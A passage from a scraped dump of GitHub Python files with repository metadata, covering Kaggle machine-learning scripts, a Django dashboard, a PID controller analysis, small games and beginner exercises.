sklearn import svm, neighbors, linear_model, neural_network\nfrom sklearn.svm import NuSVC\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom tqdm import tqdm\n\ntrain = pd.read_csv('../input/train.csv')\ntest = pd.read_csv('../input/test.csv')\n\noof = np.zeros(len(train))\npreds = np.zeros(len(test))\noof_2 = np.zeros(len(train))\npreds_2 = np.zeros(len(test))\ncols = [c for c in train.columns if c not in ['id', 'target', 'wheezy-copper-turtle-magic']]\n\nfor i in range(512):\n train2 = train[train['wheezy-copper-turtle-magic']==i]\n test2 = test[test['wheezy-copper-turtle-magic']==i]\n idx1 = train2.index; idx2 = test2.index\n train2.reset_index(drop=True,inplace=True)\n\n data = pd.concat([pd.DataFrame(train2[cols]), pd.DataFrame(test2[cols])])\n data2 = StandardScaler().fit_transform(PCA(n_components=40, random_state=4).fit_transform(data[cols]))\n train3 = data2[:train2.shape[0]]; test3 = data2[train2.shape[0]:]\n \n # STRATIFIED K FOLD (Using splits=25 scores 0.002 better but is slower)\n skf = StratifiedKFold(n_splits=5, random_state=42)\n for train_index, test_index in skf.split(train2, train2['target']):\n\n clf = NuSVC(probability=True, kernel='poly', degree=4, gamma='auto', random_state=4, nu=0.59, coef0=0.053)\n clf.fit(train3[train_index,:],train2.loc[train_index]['target'])\n oof[idx1[test_index]] = clf.predict_proba(train3[test_index,:])[:,1]\n preds[idx2] += clf.predict_proba(test3)[:,1] / skf.n_splits\n \n clf = neighbors.KNeighborsClassifier(n_neighbors=17, p=2.9)\n clf.fit(train3[train_index,:],train2.loc[train_index]['target'])\n oof_2[idx1[test_index]] = clf.predict_proba(train3[test_index,:])[:,1]\n preds_2[idx2] += clf.predict_proba(test3)[:,1] / skf.n_splits\n \n #if i%15==0: print(i)\n \nprint(roc_auc_score(train['target'], oof))\nprint(roc_auc_score(train['target'], oof_2))\nprint(roc_auc_score(train['target'], 0.8*oof+0.2*oof_2))\nprint(roc_auc_score(train['target'], 0.95*oof+0.05*oof_2))\nprint(roc_auc_score(train['target'], 1.05*oof-0.05*oof_2))\n\nsub = pd.read_csv('../input/sample_submission.csv')\nsub['target'] = preds\nsub.to_csv('submission.csv', index=False)\n\nsub['target'] = 0.8*preds+0.2*preds_2\nsub.to_csv('submission_2.csv', index=False)\n\nsub['target'] = 0.95*preds+0.05*preds_2\nsub.to_csv('submission_3.csv', index=False)\n\nsub['target'] = 1.05*preds-0.05*preds_2\nsub.to_csv('submission_3.csv', index=False)","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/instant-gratification/Bojan Tunguz/pca-nusvc-knn.py","file_name":"pca-nusvc-knn.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"27614532645","text":"#!/usr/bin/env python3\n\n# Created by: Trinity Armstrong\n# Created on: November 2019\n# This program calculates the volume of a sphere\n\nimport math\n\n\ndef calculate(radius):\n # This function calculates the volume of a sphere\n\n # Process\n volume = 4/3*math.pi*radius**3\n\n return volume\n\n\ndef main():\n # This function gets the radius then outputs the answer\n\n # Input\n while True:\n print(\"\")\n user_radius = input(\"Enter the radius of your sphere here (cm): \")\n\n try:\n user_radius = int(user_radius)\n volume = calculate(radius=user_radius)\n if user_radius == int(user_radius):\n # Output\n print(\"The volume of your sphere is {}cm³.\".format(volume))\n break\n else:\n print(\"\")\n print(\"Error! Try again.\")\n except Exception:\n print(\"\")\n print(\"Error! Try again.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Trinity-Armstrong/ICS3U-Assignment6-Python","sub_path":"volume_of_sphere.py","file_name":"volume_of_sphere.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43193985125","text":"# -- encoding=utf-8 --\nimport os, sys\nsys.path.insert(0, os.path.abspath(os.curdir))\n\nfrom utils.decorator import render_to, login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse\nimport json\nfrom django.core.paginator import Paginator\nimport logging\nfrom utils.redisclient import rc\nfrom releaseinfo import DETAIL_KEY_PREFIX, STATUS_RESULT_KEY,IP_KEY_PREFIX,MINIONS_SET_KEY, MINIONS_UP_SET_KEY, \\\n MINIONS_DOWN_SET_KEY\n\nlogger = logging.getLogger('logger_agent')\n\n@login_required\n@render_to('agent/contentDiv.html')\n@csrf_exempt\ndef agent(request):\n table_fields = [u'IP', u'minion-id', u'Agent安装版本', u'操作系统版本', u'状态最后更新时间', u'Agent状态']\n ajax_url = u'/agent/list/' \n return locals()\n\n@login_required\n@csrf_exempt\ndef agent_list(request):\n '''\n get agent list.\n '''\n data = request.GET\n # logger.debug(\"#### start request agent status list\")\n iDisplayLength = int(data.get('iDisplayLength'))\n iDisplayStart = int(data.get('iDisplayStart'))\n sEcho = int(data.get('sEcho'))\n #iColumns = int(request.GET.get('iColumns', 0))\n # sSearch = data.get('sSearch', None)\n # iSortCol_0 = int(data.get('iSortCol_0'))\n # sSortDir_0 = data.get('sSortDir_0')\n # order_list = [None, None, None, None, None, None]\n # order_item = order_list[iSortCol_0]\n\n agent_status = data.get('agent_status','all')\n agent_ips = data.get('agent_ips','').strip()\n result={}\n try:\n cache = rc.get(STATUS_RESULT_KEY)\n result = json.loads(cache) if cache else {}\n if agent_status == 'up':\n agents = result.get('up')\n elif agent_status == 'down':\n agents = result.get('down')\n else:\n agents = result.get('down') + result.get('up')\n final_agents = set()\n if agent_ips:\n agent_ips = [ip.strip() for ip in agent_ips.split('\\n') if ip and ip.strip()] #input ips.\n for agent_ip in agent_ips:\n key=IP_KEY_PREFIX+agent_ip\n if not rc.exists(key):\n continue\n m_id = rc.get(key)\n if not rc.sismember(MINIONS_SET_KEY,m_id):\n logger.debug(\"{0} is not in redis cache {1}\".format(m_id,MINIONS_SET_KEY))\n continue\n if agent_status == 'all' \\\n or (agent_status == 'down' and rc.sismember(MINIONS_DOWN_SET_KEY,m_id)) \\\n or (agent_status == 'up' and rc.sismember(MINIONS_UP_SET_KEY,m_id)):\n final_agents.add(m_id)\n agents = list(final_agents)\n # agents = [agent for agent in agents if not str(agent).startswith(\"syndic\")]\n except:\n logger.error(\"error get agentinfo\")\n import traceback\n error = traceback.format_exc()\n logger.error(error)\n agents = []\n #第一个参数表示需要分页的对象,可为list、tuple、QuerySet,只要它有count()或者__len__()函数\n #第二个参数为每页显示记录数\n p = Paginator(agents, iDisplayLength)\n total = p.count #总数\n page_range = p.page_range #页数list\n page = p.page(page_range[iDisplayStart / iDisplayLength])\n object_list = page.object_list\n\n sdicts = {}\n sdicts[\"sEcho\"] = sEcho\n sdicts[\"iTotalRecords\"] = total\n sdicts[\"iTotalDisplayRecords\"] = total\n sdicts[\"aaData\"] = []\n for obj in object_list:\n status = 'down' if obj in result.get('down',{}) else 'up'\n # 字段不区分status, 缓存中有的话就都列出来.\n ip = rc.hget(DETAIL_KEY_PREFIX+obj,'ip')\n salt_version = rc.hget(DETAIL_KEY_PREFIX+obj,'salt_version')\n os_version = rc.hget(DETAIL_KEY_PREFIX+obj,'os_version')\n utime = rc.hget(DETAIL_KEY_PREFIX+obj,'ctime')\n data = [ip, obj, salt_version, os_version, utime, status]\n sdicts[\"aaData\"].append(data)\n # logger.debug(\"#### end request agent status list\")\n return HttpResponse(json.dumps(sdicts, ensure_ascii=False))\n\nfrom django.conf.urls import patterns, url\nurlpatterns = patterns('',\n url(r'^agent/$', agent, name='agent'),\n url(r'^agent/list/$', agent_list),\n)","repo_name":"shwinpiocess/works-snail","sub_path":"ujobs/source/ujobs/page/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19440507592","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport sklearn.linear_model\nimport sklearn.neighbors\nimport datetime as dt\nimport scipy.stats as sp\nimport datetime\n\ntarget_date=dt.datetime.today()\n# Load the data\n#data = pd.read_excel(r'C:\\Users\\azorjf\\Downloads\\COVID-19-geographic-disbtribution-worldwide.xlsx')\ndata = pd.read_excel('https://www.ecdc.europa.eu/sites/default/files/documents/COVID-19-geographic-disbtribution-worldwide.xlsx')\n\n#dataSP[\"dateRep\"]=pd.to_datetime(dataSP[\"dateRep\"])\n#dataSP[\"dateRep\"]=dataSP[\"dateRep\"].map(dt.datetime.toordinal)\n\n#Prepare data\nfilterSP=data['countriesAndTerritories']=='Spain' #filtro por Spain\nstart_day=target_date - datetime.timedelta(days=7) #cojo únicamente 7 dias de cara al modelo\nfilterDateModel=data['dateRep']>=start_day\nfilterDate=data['dateRep']>='2020-03-13'\ndataSP=data[filterSP]\ndataSPmodel=dataSP[filterDateModel]\ndataSP=dataSP[filterDate]\n#dataSP[\"dateRep\"]=pd.to_datetime(dataSP[\"dateRep\"])\n#dataSP[\"Week\"]=zip(*pd.to_datetime(dataSP['dateRep'].isocalendar()[1]))\ntemp=pd.to_datetime(dataSPmodel[\"dateRep\"])\nX=np.c_[temp.map(dt.datetime.toordinal)]\ny=np.c_[dataSPmodel['cases']]\nz=np.c_[dataSPmodel['deaths']]\n\n\n\n\n# Select a linear model\nmodel = sklearn.linear_model.LinearRegression()\nmodelDeaths = sklearn.linear_model.LinearRegression()\n#model=sklearn.neighbors.KNeighborsRegressor(n_neighbors=3)\n\n# Train the model model.fit( X, y)\nmodel.fit(X,y)\nmodelDeaths.fit(X,z)\n\nlistaY=[]\nfor dias_prediccion in range (1,7):\n aux=(target_date+datetime.timedelta(days=dias_prediccion)).toordinal()\n listaY.append([datetime.datetime.fromordinal(aux),model.predict([[aux]])[0][0],modelDeaths.predict([[aux]])[0][0]])\n\ndfgraphic=pd.DataFrame(listaY,columns=['dateRep','cases','deaths'])\nprint(dfgraphic)\n\nframes=[dataSP,dfgraphic]\nresult=pd.concat(frames,axis=0,join='outer',sort=True)\nprint(result.head())\n#Visualize the data\nax=plt.gca() #get current axis\nresult.plot(kind='line',x='dateRep',y='cases',ax=ax)\nresult.plot(kind='line',x='dateRep',y='deaths', color='red',ax=ax)\nplt.show()\nplt.savefig('output.png')\n#print(model.corr())\nfilename='Covid19'+target_date.strftime(\"%Y%m%d%H%M%S\")\nresult.to_excel(filename+'.xlsx', index = False)\n\n","repo_name":"frajuas/TestPython1","sub_path":"mensaje.py","file_name":"mensaje.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5714118289","text":"while True:\n\tline = int(input())\n\tif line == 0:\n\t\tbreak\n\n\tpost = [] \n\tfor i in range(line):\n\t\tpost.append(input())\n\n\tindex = 0\n\tfor line in post:\n\t\tisPresent = False \n\t\tfor char in range(index, len(line)):\n\t\t\tif line[char] == ' ':\n\t\t\t\tindex = char\n\t\t\t\tisPresent = True\n\t\t\t\tbreak\n\t\t\tif isPresent == False:\n\t\t\t\tif index < len(line):\n\t\t\t\t\tindex = len(line)\n\tprint (index+1)\n","repo_name":"zmrdltl/problemSolving","sub_path":"boj/string/9494.py","file_name":"9494.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"38036219477","text":"# -*- coding: utf-8 -*-\n#usar python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sympy import *\n# import math\nfrom scipy.signal import lti, bode, lsim, TransferFunction, step, step2\nfrom scipy.signal import cont2discrete, dbode\nfrom tc_udemm import sympy_to_lti, lti_to_sympy\n\n\"\"\"\n Primer Parcial Teoria de Control\n 2019\n\"\"\"\n\n\n########################################\n# Determinar la Planta segun los datos #\n########################################\npsi = 0.25\nwn = 4\nvfinal = 2\n\n# Ecuacion de la Planta\ns = Symbol('s')\n\nplanta = (wn**2 * vfinal) / (s**2 + 2 * psi * wn * s + wn**2)\n\nPlant_out_sim = planta.simplify()\nprint ('Plant_out: ')\nprint (Plant_out_sim)\n\n#####################################################\n# Desde aca utilizo ceros y polos que entrego sympy #\n#####################################################\nplanta = sympy_to_lti(Plant_out_sim)\nprint (\"planta con sympy:\")\nprint (planta)\n\n\n####################################################\n# Respuesta Escalon de la planta al Duty Propuesto #\n####################################################\nt = np.linspace(0, 0.2, num=2000)\nu = np.ones(t.size) * Duty\nt, y, x = lsim(planta, T=t, U=u)\n\nfig, ax = plt.subplots()\nax.set_title('Respuesta escalon Close Loop')\nax.set_ylabel('Vout')\nax.set_xlabel('Tiempo [s]')\nax.grid()\nax.plot(t, y)\n\nplt.tight_layout()\nplt.show()\n\n########################################\n# Respuesta en Frecuencia de la Planta #\n########################################\nfreq = np.arange(1, 100000, 1)\nw, mag, phase = bode(planta, freq)\n\nfig, (ax1, ax2) = plt.subplots(2,1)\nax1.semilogx (w/(2*np.pi), mag, 'b-', linewidth=\"1\")\nax1.set_title('Plant Tf - Magnitude')\n\nax2.semilogx (w/(2*np.pi), phase, 'r-', linewidth=\"1\")\nax2.set_title('Phase')\n\nplt.tight_layout()\nplt.show()\n\n\n\"\"\" \n PID Analogico\n PID completo Tf = Kp + Ki/s + s Kd Tf = 1/s * (s**2 Kd + s Kp + Ki)\n muy dificil analizar, basicamente polo en origen y dos ceros\n los dos ceros, segun los parametros elegidos, pueden llegar a ser complejos conjugados\n\n si fuese solo PI tengo Tf = 1/s * Kp * (s + Ki/Kp)\n esto es polo en origen w = 1; cero en w = Ki/Kp; ganancia Kp\n\n si fuese solo PD tengo Tf = Kd * (s + Kp/Kd)\n esto es cero en w = Kp/Kd y ganancia Kd\n o la ganancia es Kp??\n\n Conclusion:\n elijo Kp para la ganancia media, ej 0dB Kp = 1\n elijo primer cero, ej 15.9Hz, Ki = 100\n elijo segundo cero, ej 1590Hz, Kd = 0.0001\n\"\"\"\n#################\n# PID analogico #\n#################\nkp = 1\nki = 10\nzero_d = 250\nw_d = 2 * np.pi * zero_d\nkd = kp / w_d\nnew_pole = 6.28 * 2630\n# new_pole = 0\n\nif new_pole != 0:\n Pid_out = (kp + ki/s + s*kd) * (new_pole / (s + new_pole))\nelse:\n Pid_out = (kp + ki/s + s*kd)\n\nPid_out_sim = Pid_out.simplify()\n\nprint ('Pid_out: ')\nprint (Pid_out_sim)\n\n##############################################\n# Grafico de Bode con Polos y Ceros de sympy #\n##############################################\npid = sympy_to_lti(Pid_out_sim)\nprint (\"PID con sympy:\")\nprint (pid)\n\nfreq = np.arange(1, 1000000, 1)\n\nw, mag, phase = bode(pid, freq)\n\nfig, (ax1, ax2) = plt.subplots(2,1)\nax1.semilogx (w/(2*np.pi), mag, 'b-', linewidth=\"1\")\nax1.set_title('PID Tf - Magnitude')\n\nax2.semilogx (w/(2*np.pi), phase, 'r-', linewidth=\"1\")\nax2.set_title('Phase')\n\nplt.tight_layout()\nplt.show()\n\n#######################################################\n# Multiplico Transferencias para OpenLoop y CloseLoop #\n#######################################################\nc = lti_to_sympy(pid)\np = lti_to_sympy(planta)\n\nol = c * p\ncl = ol/(1+ol)\n\nopen_loop = sympy_to_lti(ol)\nopen_loop = TransferFunction(open_loop.num, open_loop.den) #normalizo ol\nclose_loop = sympy_to_lti(cl)\nclose_loop = TransferFunction(close_loop.num, close_loop.den) #normalizo cl\n\nw, mag_ol, phase_ol = bode(open_loop, freq)\nw, mag_cl, phase_cl = bode(close_loop, freq)\n\n\nfig, (ax1, ax2) = plt.subplots(2,1)\nax1.semilogx(w/(2*np.pi), mag_ol, 'b')\nax1.semilogx(w/(2*np.pi), mag_cl, 'y')\nax1.set_title('Analog OpenLoop Blue, CloseLoop Yellow')\nax1.set_ylabel('Amplitude P D2 [dB]', color='b')\nax1.set_xlabel('Frequency [Hz]')\nax1.set_ylim([-40, 40])\n\nax2.semilogx(w/(2*np.pi), phase_ol, 'b')\nax2.semilogx(w/(2*np.pi), phase_cl, 'y')\nax2.set_ylabel('Phase', color='r')\nax2.set_xlabel('Frequency [Hz]')\n\nplt.tight_layout()\nplt.show()\n\n######################################\n# Realimento y veo Respuesta escalon #\n######################################\nt = np.linspace(0, 0.2, num=2000)\nt, y = step2(close_loop, T=t)\n\nfig.clear()\nfig, ax = plt.subplots()\nax.set_title('Respuesta escalon Close Loop')\nax.set_ylabel('Vout')\nax.set_xlabel('Tiempo [s]')\nax.grid()\nax.plot(t, y)\n\nplt.tight_layout()\nplt.show()\n\n","repo_name":"MarianoDel/spyder_python","sub_path":"algos/boost_ccm_analog_01.py","file_name":"boost_ccm_analog_01.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22240310701","text":"import pygame\n\n#initialising pygame and screen window\npygame.init()\nscreen = pygame.display.set_mode((800,600))\n\n# Title and Icon\npygame.display.set_caption(\"Space Invaders\")\nicon = pygame.image.load('spaceship.png')\npygame.display.set_icon(icon)\n\n# player\nplayerImg = pygame.image.load('player.png')\nplayX = 370\nplayY = 480\n\ndef player ():\n screen.blit(playerImg,(playX,playY))\n\n\n# Game loop\nrunning = True\nwhile running :\n\n #RGB\n screen.fill((0 , 0 , 0))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n\n player()\n pygame.display.update()\n","repo_name":"rish742/All_Programs","sub_path":"PyGame/SpaceInvader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39714281698","text":"import logging\nimport os\nimport utils\nfrom utils.downloadWord2vec import download_word2vec_newspaper\nfrom utils.prepareData import _return_stopword_removed_dataframe, _train_test_split\nfrom utils.weightedTfIdfVectorizer import TfIdfEmbeddingVectorizer\nfrom torch.utils.data import DataLoader\n\nfrom model.siameseDataset import SiameseDataset\nfrom model.siameseNetwork import SiameseNetwork\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\n\ntorch.manual_seed(42)\nnp.random.seed(42)\n\ndef main():\n\timport argparse\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('input_size', type=int)\n\tparser.add_argument('hidden_size', type=int)\n\tparser.add_argument('num_layers', type=int)\n\tparser.add_argument('dropout', type=float)\n\tparser.add_argument('num_classes', type=int)\n\tparser.add_argument('bidirectional', type=bool)\n\tparser.add_argument('batch_size', type=int)\n\tparser.add_argument('epoch', type=int)\n\n\targs = parser.parse_args()\n\n\ndef train(args):\n\tword2vec = download_word2vec_newspaper()\n\tdf = _return_stopword_removed_dataframe\n\ttrain_df, test_df = _train_test_split(df)\n\tdocuments = df['question1_without_stopword'].tolist() + df['question2_without_stopword'].tolist()\n\n\ttfidfVectorizer = TfIdfEmbeddingVectorizer()\n\ttfidfVectorizer.fit(documents)\n\ttrain_dataset = SiameseDataset(train_df, tfidfVectorizer)\n\ttest_dataset = SiameseDataset(test_df, tfidfVectorizer)\n\n\ttrain_dataloader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True)\n\ttest_dataloader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=True)\n\n\n\tmodel = SiameseNetwork(\n\t\tinput_size=args.input_size,\n\t\thidden_size=args.hidden_size,\n\t\tnum_layers=args.num_layers,\n\t\tdropout=args.dropout,\n\t\tnum_classes=args.num_classes,\n\t\tbidirectional=args.bidirectional\n\t)\n\n\n\tloss_fn = torch.nn.NLLoss()\n\toptimizer = optim.Adam(model.parameters(), lr=0.0001)\n\t\n\n\n\tfor epoch in range(args.epoch):\n\t\tcur_loss = 0.0\n\t\tval_loss = 0.0\n\t\tcur_acc = 0.0\n\t\ttotal = 0\n\t\tmodel.train()\n\t\tfor idx, data in enumerate(train_dataloader):\n\t\t\tq1, q2, label = data\n\t\t\toptimizer.zero_grad()\n\t\t\toutputs = model(q1, q2)\n\t\t\tloss = loss_fn(outputs, label)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\t\t\tcur_loss += loss.itm()\n\t\t\n\t\twith torch.no_grad():\n\t\t\tmodel.eval()\n\t\t\tfor _, data in enumerate(test_dataloader):\n\t\t\t\tq1, q2, label = data\n\t\t\t\toutputs = model(q1, q2)\n\t\t\t\tloss = loss_fn(outputs, label)\n\t\t\t\t_, pred = torch.max(outputs, 1)\n\t\t\t\tval_loss += loss.item()\n\t\t\t\tcur_acc += (pred == label).sum().item()\n\t\t\t\ttotal += outputs.size(0)\n\n\t\tacc = cur_acc * 100 / total\n\t\tprint('Epoch {}:\\t Acc {}'.format(epoch, acc))\n\n\t\t\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n\n","repo_name":"JiHunWang/quora-question-similarity-kaggle","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1942611795","text":"import sys,time,os,json,datetime,operator\n\n#SELECT * FROM cddata WHERE Date > 2019-01-01 and Date < 2019-01-20\nnew_file = ''\nfor root,dirs, files in os.walk('data'):\n #print(root,dirs,files)\n path = root.split(os.sep)\n for fn in files:\n fp = root+os.sep+fn\n #print(fp)\n f_2 = open(fp, 'r')\n for line in f_2:\n data = json.loads(line)\n payload = data['payload']\n payload = json.loads(payload)\n# print(payload['received'])\n k = payload['received'].split('T')[0]\n #print (k)\n if k > '2019-01-01' and k < '2019-01-20':\n new_file += line\n\n\nwith open('output.txt','wt') as w:\n w.write(new_file)\n","repo_name":"dingdongdong1992/dateFilter","sub_path":"datefilter.py","file_name":"datefilter.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71123250401","text":"from django.shortcuts import render_to_response\nfrom activity.models import Activity, act_allow_group\nfrom activity.forms import ActivityForm\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core import serializers\nfrom django.core.context_processors import csrf\nfrom group.models import Group as Grp\nfrom django.contrib.auth.models import Group, User\nfrom django import forms\nimport datetime\n\ndef write_act(request):\n if request.method == 'POST':\n form = ActivityForm(request.POST, request.FILES)\n if form.is_valid():\n # activity\n n = form.save(commit = False)\n n.write_date = datetime.datetime.now()\n n.save()\n #the line below should be uncommented when user is added\n #n.writer_id = request.user.id\n\n\n # allow_group\n # to be done\n return HttpResponseRedirect('/write/')\n else:\n form = ActivityForm()\n return render_to_response('pushact.html', {'form': form})\n\ndef activity(request, typeOrGroup, name):\n if request.method =='POST':\n # using filter form, still need modification for js\n current_num = int(request.POST['aaa'])\n new = activityFilterForm(request.POST) # is this line right?\n if new.is_valid():\n new.acFilter()\n json = serializers.serialize('json', new.ac[current_num:current_num+4])\n return HttpResponse(json)\n else:\n return HttpResponse('The post data is not valid!')\n else:\n ac = activityFilterForm()\n\n ac.full_clean()\n if typeOrGroup == 'type':\n ac.typeFilter(name);\n elif typeOrGroup == 'group':\n #need to check permission for seek\n ac.groupFilter(name);\n ac.acFilter()\n return render_to_response('actlist.html', {'activities': ac.ac[:6]})\n\nclass activityFilterForm(forms.Form):\n aaa = forms.IntegerField(required = False)\n ac = Activity.objects.all()\n\n type = forms.CharField(label='type', max_length=20, required = False)\n group = forms.CharField(label='group', max_length=20, required = False)\n seek = forms.BooleanField(required = False)\n\n title = forms.CharField(label='title', max_length=30, required = False)\n\n def acFilter(self):\n if 'type' in self.data:\n self.ac = self.ac.filter(type = self.cleaned_data['type'])\n if 'group' in self.data:\n self.ac = self.ac.filter(group = self.cleaned_data['group'])\n if not 'seek' in self.data: # do not include activities already due\n self.ac.filter(due_date__gte = datetime.datetime.now()) # naive datetime?\n\n if 'title' in self.data: # search title\n self.ac = self.ac.filter(title__icontains = self.cleaned_data['title'])\n\n self.ac = self.ac.order_by('-write_date')\n\n # may add group filter to obtain seeked or unseeked activities for different groups\n\n def typeFilter(self, type):\n self.ac = self.ac.filter(type = type)\n\n def groupFilter(self, group):\n self.ac = self.ac.filter(group = group)\n\n\n\ndef activity_page(request, ID):\n # need to check permission if private\n activity = Activity.objects.get(id=ID)\n return render_to_response('actcontent.html', {'activity': activity})\n\n\n","repo_name":"Clause321/JIplatform","sub_path":"activity/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18539761153","text":"'''\n3. (Convert feet into meters) Write a program that reads a number in feet, converts it\nto meters, and displays the result. One foot is 0.305 meters.\n\n'''\n\n# Getting feet value from the user\nfeet = eval(input(\"Enter a value for feet:\"))\n\n# Converting feet to meters\nmeters = feet * 0.305\n\n# Displaying Result(using formating)\nprint(\"{} Feet is {} Meters\".format(feet, meters))","repo_name":"musawakiliML/Python-Exercises","sub_path":"Introduction to Programming using Python/Chapter 2/Ex2.3.py","file_name":"Ex2.3.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74217364642","text":"import tkinter as tk\n\n# renaming the process header name\napp = tk.Tk(className=' Battleships')\n\n# classifying the elements\nleftFrame = tk.Frame(app)\nrightFrame = tk.Frame(app)\nbottomLabel = tk.Label(app, text=\"Welcome to the game, Click something\")\n\n# defining the game area\nleftFrame.grid(row=0, column=0, padx=(10, 20), pady=10, ipady=0)\nrightFrame.grid(row=0, column=1, padx=(20, 10), pady=10, ipady=0)\nbottomLabel.grid(row=1, column=0, columnspan=2, padx=0, pady=(0, 10), ipadx=0)\n\n# ship location test\npship = {\"ship1\": [[1], [1]],\n \"ship2\": [[2, 2], [2, 3]],\n \"ship3\": [[6, 7, 8], [3, 3, 3]],\n \"ship4\": [[5, 5, 5, 5], [6, 7, 8, 9]],\n \"ship5\": [[6, 7, 8, 9, 10], [8, 8, 8, 8, 8]]}\n\n\n# Logic check\ndef click(row, col, table):\n row = row + 1\n col = col + 1\n xukai = False\n for i in range(5):\n if xukai:\n break\n else:\n for k in range(5):\n try:\n if row == pship.get(\"ship%s\" % (i + 1))[0][k] and col == pship.get(\"ship%s\" % (i + 1))[1][k]:\n print(\"Hit ship%s at \" % (i + 1), pship.get(\"ship%s\" % (i + 1))[0][k], pship.get(\"ship%s\" % (i + 1))[1][k])\n xlocation = pship.get(\"ship%s\" % (i + 1))[0][k]\n ylocation = pship.get(\"ship%s\" % (i + 1))[1][k]\n bottomLabel.configure(text=\"Hit ship%s at %s %s\" % (i + 1, xlocation, ylocation))\n xukai = True\n break\n except IndexError:\n bottomLabel.configure(text=\"You clicked row %s column %s on the %s table\" % (row, col, table))\n else:\n print('boo')\n bottomLabel.configure(text=\"You clicked row %s column %s on the %s table\" % (row, col, table))\n\n\n# spawning of the buttons\nfor x in range(10):\n for y in range(10):\n lbuttons = tk.Button(leftFrame, text=\"%s\" % 'x', command=lambda row=x, col=y, table=\"Left\": click(row, col, table))\n rbuttons = tk.Button(rightFrame, text=\"%s\" % 'x', command=lambda row=x, col=y, table=\"Right\": click(row, col, table))\n # Button(frame, text=\"x\")\n lbuttons.grid(column=x, row=y, ipadx=10, ipady=10)\n rbuttons.grid(column=x, row=y, ipadx=10, ipady=10)\n\napp.mainloop()\n","repo_name":"JLKI/Battleships","sub_path":"Battleshipv1.py","file_name":"Battleshipv1.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15699640325","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\nget_ipython().magic(u'matplotlib inline')\nsns.set_style(\"whitegrid\")\nfrom sklearn import preprocessing\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# In[ ]:\n\n\n#Load Titanic Dataset\ntrain = pd.read_csv(\"../input/train.csv\")\ntest = pd.read_csv(\"../input/test.csv\")\n\n\n# In[ ]:\n\n\n#Get detailed information about datasets\ntrain.info()\nprint('=' * 40)\ntest.info()\n\n\n# # Feature Engineering\n\n# In[ ]:\n\n\n#Get a view of data\ntrain.head(10)\n\n\n# In[ ]:\n\n\n#Get other description\ntrain.describe()\n\n\n# In[ ]:\n\n\n#Remove unnecessary columns\ntrain.drop(['PassengerId', 'Ticket'], axis=1, inplace=True)\ntest.drop(['Ticket'], axis=1, inplace=True)\n\n\n# In[ ]:\n\n\n#Feature - Pclass\n\n#Number of null values\nprint(\"Total Null Entries in training samples :\", train['Pclass'].isnull().sum())\nprint(\"Total Null Entries in testing samples :\", test['Pclass'].isnull().sum())\n\n#Data Visualization\nfig, (ax1, ax2) = plt.subplots(nrows=1, ncols=2, figsize=(12,5))\nsns.pointplot(data=train, x=\"Pclass\", y=\"Survived\", ax=ax1)\nsns.countplot(data=train, x=\"Pclass\", hue=\"Survived\", ax=ax2)\n\n\n# In[ ]:\n\n\n#Feature - Name\n\n#Number of null values\nprint(\"Total Null Entries in training samples :\", train['Name'].isnull().sum())\nprint(\"Total Null Entries in testing samples :\", test['Name'].isnull().sum())\n\n#Names doesn't matter much, but the title associated with it may help.\n#Extract titles from names\ntrain['Title'] = train[\"Name\"].map(lambda name : name.split(\".\")[0].split(\" \")[-1])\ntest['Title'] = test[\"Name\"].map(lambda name : name.split(\".\")[0].split(\" \")[-1])\ntrain[\"Title\"] = train[\"Title\"].map({\"Mr\" : \"Mr\", \"Mrs\" : \"Mrs\", \"Miss\" : \"Miss\", \"Master\" : \"Master\"})\ntrain[\"Title\"].fillna(\"Others\", inplace=True)\ntest[\"Title\"] = 